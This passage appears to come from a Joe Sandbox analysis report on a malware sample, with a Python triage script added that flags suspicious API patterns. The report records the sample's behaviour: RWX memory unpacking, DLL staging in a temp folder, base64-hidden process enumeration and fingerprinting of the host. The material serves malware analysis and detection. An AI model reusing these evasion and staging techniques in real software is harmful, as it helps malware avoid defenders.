                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$DirectoryFile$CloseCurrentFirstFreeLibraryNextRemove
                                                                                                            • String ID: %TEMP%\
                                                                                                            • API String ID: 3686138682-2282305525
                                                                                                            • Opcode ID: 66c05e9bfec5bc6f7d622e76609e2dd9a837fe982c02bf5270c9ee424d2a5a61
                                                                                                            • Instruction ID: dc35ce041a643583f5f8d8bd1e87a628f97aff475ff8516c22ff3c130ece2fe8
                                                                                                            • Opcode Fuzzy Hash: 66c05e9bfec5bc6f7d622e76609e2dd9a837fe982c02bf5270c9ee424d2a5a61
                                                                                                            • Instruction Fuzzy Hash: 204110746006199FC750EF69DC85A8AB7F9EF89305F0081B6A408F33A1DB74AE45CF58
                                                                                                            APIs
                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,0041688C,?,-00000001,?,?,?,00416B8B,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4), ref: 004167F2
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeInformationStringTimeZone
                                                                                                            • String ID: UTC+
                                                                                                            • API String ID: 3683333525-3251258214
                                                                                                            • Opcode ID: f41ff27d4f8f960fa14a3eacf56d40a338feca14225810b151d6a7f6519b6b57
                                                                                                            • Instruction ID: 5ec20ea157f6df9457f2aaa48a67f1a88062805be60e3b9a11f1e748eb71f9a8
                                                                                                            • Opcode Fuzzy Hash: f41ff27d4f8f960fa14a3eacf56d40a338feca14225810b151d6a7f6519b6b57
                                                                                                            • Instruction Fuzzy Hash: EE118470B047149FE755DB6ACC41B96B6FEEB8C300F1181B5B50CE3391D7349E458A5A
                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041874E,?), ref: 0040660D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: NameUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2645101109-0
                                                                                                            • Opcode ID: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
                                                                                                            • Instruction ID: 8736a32cbc394a18a167da55deab102dfeb87f5e75d2630db682c36262db7282
                                                                                                            • Opcode Fuzzy Hash: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
                                                                                                            • Instruction Fuzzy Hash: 26E086717042024BD310AF6CDC81A9976E89B48315F00483AB896D73D1FE3DDE189757
                                                                                                            APIs
                                                                                                            • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,00600FEC,00000040,00600604,00000000,00000000,00000000,00000000,00000000), ref: 0060117B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2483343238.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_600000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2706961497-0
                                                                                                            • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                                                                            • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                                                                                            • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                                                                            • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?), ref: 004096BF
                                                                                                              • Part of subcall function 0040776C: GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6), ref: 0040970D
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?,00000000), ref: 00409741
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?), ref: 00409762
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Directory$Create$AllocAttributesCurrentFileLibraryLoadString
                                                                                                            • String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
                                                                                                            • API String ID: 2652973473-1556614757
                                                                                                            • Opcode ID: 3cfc5a2fe20423dca8493bedaaafa9c7da5cfbada7a8914fee9239c54bc86b60
                                                                                                            • Instruction ID: 26d77c896aabed61a2775ccb06ba61d1ee422efe4d6d96ca95dbfc380ed6e43d
                                                                                                            • Opcode Fuzzy Hash: 3cfc5a2fe20423dca8493bedaaafa9c7da5cfbada7a8914fee9239c54bc86b60
                                                                                                            • Instruction Fuzzy Hash: DA91D9B06402049FD712EF69D885B9A37E8BF4A349F00847AF404EB7A6C778AD44CB5D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?), ref: 004096BF
                                                                                                              • Part of subcall function 0040776C: GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6), ref: 0040970D
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?,00000000), ref: 00409741
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?), ref: 00409762
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Directory$Create$AllocAttributesCurrentFileLibraryLoadString
                                                                                                            • String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
                                                                                                            • API String ID: 2652973473-1556614757
                                                                                                            • Opcode ID: 71ae6675639b850415fa3d4209e91d79375db806a0d3ef2ecf6f0eaec63e9857
                                                                                                            • Instruction ID: 5b3c55801863a32800eae0c5f30943bce4d4c5d0b2659c2e20ef893ba67f7cd3
                                                                                                            • Opcode Fuzzy Hash: 71ae6675639b850415fa3d4209e91d79375db806a0d3ef2ecf6f0eaec63e9857
                                                                                                            • Instruction Fuzzy Hash: A991E8B06402049FD711EF69D885F9A37E8BF49349F00847AB404EB7A6C778AD44CB9D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?), ref: 004096BF
                                                                                                              • Part of subcall function 0040776C: GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6), ref: 0040970D
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?,00000000), ref: 00409741
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?), ref: 00409762
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Directory$Create$AllocAttributesCurrentFileLibraryLoadString
                                                                                                            • String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
                                                                                                            • API String ID: 2652973473-1556614757
                                                                                                            • Opcode ID: 8173c44f319da0c216b2bbaf86451febc78a6db65c083bc8c63ea26582f33096
                                                                                                            • Instruction ID: 26c99af69019636de113f168175dae5416f6f3cc59ad43c6f3cb6d4c520b39b5
                                                                                                            • Opcode Fuzzy Hash: 8173c44f319da0c216b2bbaf86451febc78a6db65c083bc8c63ea26582f33096
                                                                                                            • Instruction Fuzzy Hash: A191D7B06402049FD711EF69D885F9A77E8BF49349F00847AB404EB7A6C778AD44CB9D
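Two of the function summaries above are the ones an analyst reads off directly: the NtProtectVirtualMemory call at 0060117B in the unmapped 00600000 region, whose stack slots include 00000040 (PAGE_EXECUTE_READWRITE), and the function at 004096BF-004098BA that creates %TEMP%\2fda\ or %appdata%\2fda\, changes into it, calls LoadLibraryExW with dwFlags 00000008 (LOAD_WITH_ALTERED_SEARCH_PATH, so the DLL and its dependencies are resolved relative to that fresh directory) and then resolves thirteen exports with GetProcAddress. The Python below is a triage helper added for this edit; it is neither Joe Sandbox code nor part of the sample. It parses the report's "APIs" bullet lines and applies three heuristics. The GetProcAddress threshold, the list of protect APIs and the "any slot equals 0x40" rule are the editor's assumptions, chosen because the report prints raw stack slots whose positions are not reliable; the two sample blocks are copied verbatim from the function summaries above.

```python
import re
from collections import Counter

# Win32 SDK constants used by the checks below.
LOAD_WITH_ALTERED_SEARCH_PATH = 0x00000008   # LoadLibraryExW dwFlags (third parameter)
PAGE_EXECUTE_READWRITE = 0x40                # page protection

# Sample input: the API lines of two function blocks of this report, copied verbatim.
UNPACKER_BLOCK = """
• NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,00600FEC,00000040,00600604,00000000,00000000,00000000,00000000,00000000), ref: 0060117B
"""
DROPPER_BLOCK = """
  • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?), ref: 004096BF
  • Part of subcall function 0040776C: GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6), ref: 0040970D
• SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?,00000000), ref: 00409741
• LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?), ref: 00409762
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA
"""

# One API bullet: Name.MODULE(arg,arg,...), ref: ADDRESS
API_LINE = re.compile(r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


def parse_api_lines(text: str) -> list:
    """Turn an 'APIs' section into call records. Joe Sandbox prints raw stack slots,
    so the argument list is usually longer than the API's real parameter list."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            calls.append({
                "api": m.group("api"),
                "module": m.group("module"),
                "args": [a.strip() for a in m.group("args").split(",")],
                "ref": int(m.group("ref"), 16),
                # attributed to a callee, not to the function being summarised
                "subcall": "Part of subcall function" in line,
            })
    return calls


def hexarg(call: dict, i: int):
    """Argument slot i as an int, or None when it is '?', a string or missing."""
    try:
        return int(call["args"][i], 16)
    except (IndexError, ValueError):
        return None


def triage(text: str) -> dict:
    """Three triage heuristics over one function block; thresholds are the editor's choice."""
    calls = [c for c in parse_api_lines(text) if not c["subcall"]]
    counts = Counter(c["api"] for c in calls)
    findings = {}

    # 1. Several GetProcAddress calls next to a LoadLibrary*: imports resolved at runtime,
    #    so they are absent from the PE import table.
    if counts["GetProcAddress"] >= 5 and any(c["api"].startswith("LoadLibrary") for c in calls):
        findings["dynamic_imports"] = counts["GetProcAddress"]

    # 2. LoadLibraryExW with dwFlags == LOAD_WITH_ALTERED_SEARCH_PATH in a function that also
    #    creates and enters a directory: the DLL is resolved relative to that fresh directory.
    for c in calls:
        if c["api"] == "LoadLibraryExW" and hexarg(c, 2) == LOAD_WITH_ALTERED_SEARCH_PATH:
            staged = counts["CreateDirectoryW"] > 0 and counts["SetCurrentDirectoryW"] > 0
            findings["altered_search_path_load"] = {"ref": c["ref"], "staged_directory": staged}

    # 3. A protection change whose visible slots contain PAGE_EXECUTE_READWRITE. Slot positions
    #    are unreliable in the stack dump, so any slot counts; treat it as a lead, not proof.
    for c in calls:
        if c["api"] in ("NtProtectVirtualMemory", "VirtualProtect", "VirtualProtectEx"):
            if PAGE_EXECUTE_READWRITE in [hexarg(c, i) for i in range(len(c["args"]))]:
                findings.setdefault("rwx_protect", []).append(c["ref"])
    return findings


if __name__ == "__main__":
    print(triage(UNPACKER_BLOCK))
    print(triage(DROPPER_BLOCK))
```

Lines marked "Part of subcall function" are excluded from the counts because the report attributes them to the callee, not to the function being summarised; keeping them would, for instance, credit this function with a GetFileAttributesW call that belongs to 0040776C.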

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,), ref: 00416320
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416326
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,), ref: 0041634E
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416354
                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE), ref: 00416393
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416399
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001), ref: 004163AC
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004163CB
                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0041643A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416448
                                                                                                            • GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,,?,Zone: ,?,00416CC4), ref: 004164C6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc$Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                                                                                                            • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll$`A
                                                                                                            • API String ID: 1927487376-3005690938
                                                                                                            • Opcode ID: cd77d7d78616101fb56a5fcd42693564515e67bc3a59ccfcd1055d7d514566b2
                                                                                                            • Instruction ID: 6248dc0f45d153d3d9923ca8400dc11361dccf40d7e1b6d03c7d8f30243dd753
                                                                                                            • Opcode Fuzzy Hash: cd77d7d78616101fb56a5fcd42693564515e67bc3a59ccfcd1055d7d514566b2
                                                                                                            • Instruction Fuzzy Hash: 0B9195709001199BCB10EF99C985ADEB7B9FF84304F5181BBE409B7291D739EF818B58

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 1034 4162ac-4163b3 call 4069a8 call 403990 LoadLibraryA GetProcAddress call 4069a8 call 403990 LoadLibraryA GetProcAddress call 4069a8 call 403990 call 4069a8 call 403990 LoadLibraryA GetProcAddress call 4034e4 CreateToolhelp32Snapshot 1053 4163b9-4163cf Process32FirstW 1034->1053 1054 41644a-416455 call 404648 1034->1054 1055 4163d1-41643e call 404648 call 404804 call 404648 * 2 Process32NextW 1053->1055 1056 416440-416448 CloseHandle 1053->1056 1061 416457-41645b 1054->1061 1062 4164c6-4164d9 GetCurrentProcessId call 404648 1054->1062 1055->1056 1056->1054 1063 41645d-41646c call 404648 1061->1063 1071 4165b2-4165e5 call 403508 call 4034e4 call 404810 1062->1071 1072 4164df-4164e3 1062->1072 1074 416495-4164a9 1063->1074 1075 41646e-41646f 1063->1075 1073 4164e5-4164f3 1072->1073 1079 4164f9-416503 1073->1079 1080 41659d-4165ac call 403538 1073->1080 1082 4164ab 1074->1082 1083 4164af-4164b3 1074->1083 1081 416471-41648b 1075->1081 1086 416505-41653c call 403760 call 403850 1079->1086 1087 41653e-416566 call 403760 1079->1087 1080->1071 1080->1073 1088 416491-416493 1081->1088 1089 41648d 1081->1089 1082->1083 1090 4164c0-4164c4 1083->1090 1091 4164b5-4164b8 1083->1091 1103 416570-416598 call 41610c call 403798 1086->1103 1087->1103 1104 41656b call 403850 1087->1104 1088->1074 1088->1081 1089->1088 1090->1062 1090->1063 1091->1090 1103->1080 1104->1103
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,), ref: 00416320
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416326
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,), ref: 0041634E
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416354
                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE), ref: 00416393
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416399
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001), ref: 004163AC
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004163CB
                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0041643A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416448
                                                                                                            • GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,,?,Zone: ,?,00416CC4), ref: 004164C6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc$Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                                                                                                            • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll$`A
                                                                                                            • API String ID: 1927487376-3005690938

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 00416AF3
                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 00416B0A
                                                                                                              • Part of subcall function 004167B4: GetTimeZoneInformation.KERNEL32(?,00000000,0041688C,?,-00000001,?,?,?,00416B8B,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4), ref: 004167F2
                                                                                                              • Part of subcall function 00415E64: GetSystemInfo.KERNEL32(0041987E,00000000,00415FF0,?,?,00000000,00000000,?,00416BA9,?,,?,Zone: ,?,00416CC4,?), ref: 00415E88
                                                                                                            • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4,?,Layouts: ,?), ref: 00416BBF
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,), ref: 00416320
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416326
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,), ref: 0041634E
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416354
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE), ref: 00416393
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416399
                                                                                                              • Part of subcall function 004162B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001), ref: 004163AC
                                                                                                              • Part of subcall function 004162B0: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004163CB
                                                                                                            • Sleep.KERNEL32(00000001,00416CC4,00416CC4,?,?,00000001,,?,?,,?,Zone: ,?,00416CC4,?,LocalTime: ), ref: 00416BE9
                                                                                                            • Sleep.KERNEL32(00000001,00416CC4,[Soft],?,00000001,00416CC4,00416CC4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416C08
